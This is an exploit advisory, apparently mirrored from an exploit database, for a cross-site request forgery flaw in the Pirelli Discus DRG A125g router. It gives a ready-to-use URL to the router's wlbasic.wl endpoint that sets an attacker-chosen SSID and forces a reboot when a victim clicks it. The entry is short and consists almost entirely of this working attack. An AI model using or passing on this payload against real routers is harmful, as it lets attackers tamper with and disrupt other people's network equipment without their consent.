# Exploit Title: Pirelli Discus DRG A125g remote change SSID value vulnerability # Hardware: Pirelli Discus DRG A125g # Date: 2013/11/23 # Exploit Author: Sebastián Magof # Tested on: Linux/Windows # Twitter: @smagof # Greetz: Family, friends && under guys. # Special Greetz: # (\/) # (**) αlpha #(")(") #Exploit: http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof #info: where the parameter "wlSsid" is where the attacker will enter the new SSID. If the victim clicks on the url your modem / router will reboot automatically with the new SSID provided by the attacker.Брой прочитания на тази страница: 750
Pirelli Discus DRG A125g – Remote Change SSID Value Vulnerability